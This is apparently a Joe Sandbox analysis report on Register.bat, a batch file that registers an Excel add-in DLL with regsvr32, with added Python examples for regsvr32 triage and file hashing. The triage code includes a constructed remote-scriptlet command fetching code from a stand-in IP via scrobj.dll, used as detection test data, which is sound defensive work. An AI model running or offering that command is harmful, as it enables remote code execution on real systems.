ID: 447398
Sample Name: Register.bat
Cookbook: default.jbs
Time: 17:15:31
Date: 12/07/2021
Version: 32.0.0 Black Diamond

Table of Contents

Table of Contents (p. 2)
Windows Analysis Report Register.bat (p. 3)
  Overview (p. 3)
    General Information (p. 3)
    Detection (p. 3)
    Signatures (p. 3)
    Classification (p. 3)
    Process Tree (p. 3)
  Malware Configuration (p. 3)
  Yara Overview (p. 3)
  Sigma Overview (p. 3)
    System Summary (p. 3)
  Jbx Signature Overview (p. 3)
    System Summary (p. 4)
  Mitre Att&ck Matrix (p. 4)
  Behavior Graph (p. 4)
  Screenshots (p. 4)
    Thumbnails (p. 5)
  Antivirus, Machine Learning and Genetic Malware Detection (p. 5)
    Initial Sample (p. 5)
    Dropped Files (p. 5)
    Unpacked PE Files (p. 5)
    Domains (p. 5)
    URLs (p. 6)
  Domains and IPs (p. 6)
    Contacted Domains (p. 6)
    Contacted IPs (p. 6)
  General Information (p. 6)
  Simulations (p. 6)
    Behavior and APIs (p. 6)
  Joe Sandbox View / Context (p. 7)
    IPs (p. 7)
    Domains (p. 7)
    ASN (p. 7)
    JA3 Fingerprints (p. 7)
    Dropped Files (p. 7)
  Created / dropped Files (p. 7)
  Static File Info (p. 7)
    General (p. 7)
    File Icon (p. 7)
  Network Behavior (p. 8)
  Code Manipulations (p. 8)
  Statistics (p. 8)
  Behavior (p. 8)
  System Behavior (p. 8)
    Analysis Process: cmd.exe PID: 2132 Parent PID: 5636 (p. 8)
      General (p. 8)
      File Activities (p. 8)
      File Read (p. 8)
    Analysis Process: conhost.exe PID: 2760 Parent PID: 2132 (p. 8)
      General (p. 8)
    Analysis Process: regsvr32.exe PID: 4452 Parent PID: 2132 (p. 9)
      General (p. 9)
      File Activities (p. 9)
  Disassembly (p. 9)
    Code Analysis (p. 9)

Copyright Joe Security LLC 2021 Page 2 of 9

Windows Analysis Report Register.bat

Overview

General Information

Sample Name: Register.bat
Analysis ID: 447398
MD5: 4b61829c0e26ed154e2bd261aebf2dab
SHA1: 679618a0b0a21dd3472bd3c85f97a442c51898aa
SHA256: d7694e4f2a4ee592545a2ec559a2f91dff7a3ef9e2e142932700bc038b8ba3f4
Most interesting Screenshot: (image)

Detection

Score: 22
Range: 0 - 100
Whitelisted: false
Confidence: 80%

Signatures

- Sigma detected: Regsvr32 Anomaly
- Creates a process in suspended mode…
- Program does not show much activity…
- Queries the volume information (nam…
- Registers a DLL
- Tries to load missing DLLs

Classification

Verdict scale: malicious / suspicious / clean (this sample: suspicious, score 22 of 100)
Radar categories: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware

Process Tree

System is w10x64

cmd.exe (PID: 2132, cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\Register.bat' ', MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  conhost.exe (PID: 2760, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  regsvr32.exe (PID: 4452, cmdline: Regsvr32.exe /i adxloader.Sigma.Mona.ExcelAddin.Reporting.dll, MD5: D78B75FC68247E8A63ACBA846182740E)
cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly
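What the Sigma match and the process tree together describe is a script host (cmd.exe running Register.bat) launching Regsvr32.exe /i with a bare module name. Without /n, regsvr32 loads that module and calls its DllRegisterServer and DllInstall exports; a bare name goes through the normal DLL search order, which includes the current directory, so the batch file loads whatever DLL of that name sits beside it, and in the sandbox nothing did, which is the "Tries to load missing DLLs" observation. The Python below is an added example, not Joe Sandbox code and not the body of the SigmaHQ "Regsvr32 Anomaly" rule (the report prints only the rule title): it applies the author's own heuristics for that class of rule, plus a missing-module check, to process-creation events constructed to mirror this report's tree. The current directory C:\Users\user\Desktop, the benign msiexec event and the remote-scriptlet event are assumptions and constructed inputs, not data from the report.

```python
# Heuristic triage of regsvr32 process-creation events (added example; not Joe
# Sandbox code and not the SigmaHQ "Regsvr32 Anomaly" rule body). The checks are
# the author's approximation of what such a rule and a missing-DLL check look for.
import ntpath
import re
from dataclasses import dataclass, field

URL_RE = re.compile(r"^(https?|ftp)://", re.I)
# Parents that normally have no business registering COM servers.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Path components under which a legitimately installed COM server rarely lives.
USER_WRITABLE = re.compile(r"\\(users|temp|appdata|programdata|public|downloads|desktop)\\", re.I)


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style field names)."""
    image: str
    command_line: str
    parent_image: str
    current_directory: str


@dataclass
class Finding:
    module: str = ""        # last bare argument: the DLL regsvr32 will load
    install_arg: str = ""   # value of /i:<arg>, handed to DllInstall (may be a URL)
    resolved: str = ""      # where the module is looked up when the name is relative
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def split_windows_cmdline(cmdline: str) -> list:
    """Split on whitespace, keeping quoted arguments whole and dropping the quotes."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def analyse_regsvr32(ev: ProcEvent, dll_exists=None) -> Finding:
    """Inspect one event. dll_exists(path) -> bool (os.path.exists on a live host)
    reproduces the sandbox's missing-DLL observation; it is skipped when None."""
    f = Finding()
    if ntpath.basename(ev.image).lower() != "regsvr32.exe":
        return f
    switches = set()
    for arg in split_windows_cmdline(ev.command_line)[1:]:
        if arg[:1] in "/-":
            name, _, value = arg[1:].partition(":")
            switches.add(name.lower())
            if name.lower() == "i" and value:
                f.install_arg = value
        else:
            f.module = arg

    parent = ntpath.basename(ev.parent_image).lower()
    if parent in SCRIPT_HOSTS:
        f.reasons.append(f"spawned by script host {parent}")
    if parent in OFFICE_APPS:
        f.reasons.append(f"spawned by Office application {parent}")
    if URL_RE.match(f.install_arg):
        f.reasons.append("DllInstall argument is a URL (remote scriptlet)")
    if ntpath.basename(f.module).lower() == "scrobj.dll":
        f.reasons.append("scrobj.dll runs COM scriptlets")
    if {"i", "n"} <= switches:
        f.reasons.append("/n /i skips DllRegisterServer and calls only DllInstall")

    if f.module:
        if ntpath.isabs(f.module):
            f.resolved = f.module
        else:
            # Simplification: a bare name goes through the normal DLL search order; the
            # current directory (the launching script's folder here) is the part of that
            # order an attacker controls, so that is where we resolve and check it.
            f.resolved = ntpath.join(ev.current_directory, f.module)
            f.reasons.append(f"relative module name, resolved via CWD to {f.resolved}")
        if USER_WRITABLE.search(f.resolved):
            f.reasons.append("module is under a user-writable directory")
        if dll_exists is not None and not dll_exists(f.resolved):
            f.reasons.append(f"module not found at {f.resolved} (missing DLL)")
    return f


def triage(events, dll_exists=None):
    """Return (event, finding) pairs for every event that raised at least one reason."""
    return [(ev, f) for ev in events
            if (f := analyse_regsvr32(ev, dll_exists)).suspicious]


# Constructed events. The first mirrors the report's process tree; its CWD is an
# assumption (Register.bat changes to its own folder). The other two are made up:
# a benign installer registration and a classic remote-scriptlet abuse.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\regsvr32.exe",
              "Regsvr32.exe /i adxloader.Sigma.Mona.ExcelAddin.Reporting.dll",
              r"C:\Windows\System32\cmd.exe", r"C:\Users\user\Desktop"),
    ProcEvent(r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\addin.dll"',
              r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32"),
    ProcEvent(r"C:\Windows\System32\regsvr32.exe",
              "regsvr32.exe /s /n /u /i:http://192.0.2.10/a.sct scrobj.dll",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Users\user\Documents"),
]

if __name__ == "__main__":
    for ev, f in triage(SAMPLE_EVENTS):
        print(ev.command_line)
        for r in f.reasons:
            print("  -", r)
    # Reproduce the sandbox's missing-DLL observation for the report-like event.
    print(analyse_regsvr32(SAMPLE_EVENTS[0], dll_exists=lambda p: False).reasons[-1])
```

The /s in the benign msiexec event is deliberately not a reason on its own, because silent registration is what every installer does; the signal is the combination of parent, switches, where the module resolves, and whether it is there at all. On a live host pass `os.path.exists` as `dll_exists`; in a detection pipeline, feed it the event's CurrentDirectory field, which Sysmon records but many EDR exports drop.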

Jbx Signature Overview


System Summary:

Mitre Att&ck Matrix

Techniques followed by a count (for example "Scripting 1") are the ones this sample's signatures matched; the remaining entries are the matrix's unmatched placeholders.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Scripting 1; Scheduled Task/Job; At (Linux); At (Windows)
Persistence: DLL Side-Loading 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Process Injection 1 1; DLL Side-Loading 1; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Regsvr32 1; Process Injection 1 1; Scripting 1; DLL Side-Loading 1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Security Software Discovery 1; System Information Discovery 1 1; Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Data Obfuscation; Junk Data; Steganography; Protocol Impersonation
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
Impact: Modify System Partition; Device Lockout; Delete Data

Behavior Graph

(Rendered as an image; the labels recoverable from it follow.)

ID: 447398
Sample: Register.bat
Startdate: 12/07/2021
Architecture: WINDOWS
Score: 22

Nodes and edges:
  cmd.exe (Is Windows Process) -- started --> regsvr32.exe
  cmd.exe (Is Windows Process) -- started --> conhost.exe
  Signature node: Sigma detected: Regsvr32 Anomaly

Legend: Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 447398
Start date: 12.07.2021
Start time: 17:15:31
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 49s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Register.bat
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled; EGA enabled; HDC enabled; AMSI enabled
Analysis Mode: default
Analysis stop reason:
Detection: SUS
Classification: sus22.winBAT@4/0@0/0
EGA Information: Failed
HDC Information: Failed
HCA Information: Successful, ratio: 100%
Number of executed functions: 0
Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Enable AMSI; Found application associated with file extension: .bat
Warnings:

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: DOS batch file, ASCII text, with CRLF line terminators
Entropy (8bit): 5.24398767650524
TrID:
File name: Register.bat
File size: 922
MD5: 4b61829c0e26ed154e2bd261aebf2dab
SHA1: 679618a0b0a21dd3472bd3c85f97a442c51898aa
SHA256: d7694e4f2a4ee592545a2ec559a2f91dff7a3ef9e2e142932700bc038b8ba3f4
SHA512: 86c6f0c379cb5c2b8d69e8ed101944f0179ff86c6d91a766a921771ac8a8f63dd2f2b06276d12b244eb9da9dceb0b1f300f0c599fc7eba18f53457d71fd84203
SSDEEP: 24:ZjkAAOyGFZXZ6d8RneSG42XDZXZYPM47RneSFMd2XTUZXZRHM4rGPF+MDP7+MZ1m:qjtGbyaej4wtWPMueCMdwsfHMHF+Mz7i
File Content Preview: @ OFF....ECHO...ECHO *** Moving to directory.. ECHO...%~d0.. "%~p0"..CD....REM...=> Not needed since it is in the same directory => Will be done automatically by dependance..REM ECHO...REM ECHO *** Registering .Net Library in the GAC "AddinExpress.MS

File Icon

Icon Hash: 988686829e9ae600
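The General block above (size, hashes, 8-bit entropy, file type) is what you recompute locally before acting on a report: a hash mismatch means you hold a different file than the one analysed, and the entropy figure says whether the bytes are plain text (ASCII scripts typically land between roughly 4 and 6 bits per byte, as the 5.24 here does) or packed and encrypted content approaching the 8-bit maximum. The Python below is an added example, not Joe Sandbox code; the batch text it embeds is constructed for the demonstration and is not Register.bat, so its hashes and entropy do not reproduce the report's values, and the entropy bands are the author's rough thresholds rather than anything the sandbox uses.

```python
# Recompute the "Static File Info > General" figures for a file (added example,
# not Joe Sandbox code). Entropy is 8-bit Shannon entropy over byte frequencies.
import hashlib
import math
from collections import Counter


def shannon_entropy_8bit(data: bytes) -> float:
    """H = -sum p(b) * log2 p(b) over the byte values present; 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_band(h: float) -> str:
    """Rough bands (author's thresholds, not the sandbox's): plain text sits well
    below 6 bits/byte, compressed or encrypted payloads approach 8."""
    if h < 6.0:
        return "text-like"
    if h < 7.2:
        return "mixed / partially encoded"
    return "packed or encrypted"


def looks_like_batch(data: bytes) -> bool:
    """Cheap stand-in for file(1)'s 'DOS batch file' verdict: ASCII text whose first
    non-empty line starts with a batch keyword."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    for line in text.splitlines():
        line = line.strip().lower()
        if line:
            return line.startswith(("@echo", "echo", "@rem", "rem", "set ", "cd ", "setlocal"))
    return False


def static_file_info(data: bytes, name: str = "") -> dict:
    """The fields the report lists, computed from the bytes."""
    h = shannon_entropy_8bit(data)
    return {
        "File name": name,
        "File type": "DOS batch file, ASCII text" if looks_like_batch(data) else "unknown",
        "Line terminators": "CRLF" if b"\r\n" in data else "LF",
        "File size": len(data),
        "Entropy (8bit)": h,
        "Entropy band": entropy_band(h),
        "MD5": hashlib.md5(data).hexdigest(),
        "SHA1": hashlib.sha1(data).hexdigest(),
        "SHA256": hashlib.sha256(data).hexdigest(),
        "SHA512": hashlib.sha512(data).hexdigest(),
    }


def matches_report(data: bytes, expected_sha256: str) -> bool:
    """Check a local copy against the SHA256 a report lists before relying on its verdict."""
    return hashlib.sha256(data).hexdigest().lower() == expected_sha256.lower()


# Constructed sample in the style of the preview above; this is NOT Register.bat.
SAMPLE_BATCH = (
    b"@ECHO OFF\r\n"
    b"ECHO *** Moving to script directory\r\n"
    b"CD /D \"%~dp0\"\r\n"
    b"ECHO *** Registering add-in\r\n"
    b"Regsvr32.exe /i example_addin.dll\r\n"
)

if __name__ == "__main__":
    for key, value in static_file_info(SAMPLE_BATCH, "sample.bat").items():
        print(f"{key}: {value}")
```

Run it against the real file with `static_file_info(open(path, "rb").read(), path)` and compare the SHA256 with the one in the report; only if they agree does the verdict above apply to the bytes in front of you.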

Network Behavior

No network behavior found

Code Manipulations

Statistics

Behavior


System Behavior

Analysis Process: cmd.exe PID: 2132 Parent PID: 5636

General

Start time: 17:16:24
Start date: 12/07/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\Register.bat' '
Imagebase: 0x7ff7bf140000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

File Read

Analysis Process: conhost.exe PID: 2760 Parent PID: 2132

General

Start time: 17:16:25
Start date: 12/07/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: regsvr32.exe PID: 4452 Parent PID: 2132

General

Start time: 17:16:25
Start date: 12/07/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: Regsvr32.exe /i adxloader.Sigma.Mona.ExcelAddin.Reporting.dll
Imagebase: 0x7ff7d84a0000
File size: 24064 bytes
MD5 hash: D78B75FC68247E8A63ACBA846182740E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

Disassembly

Code Analysis

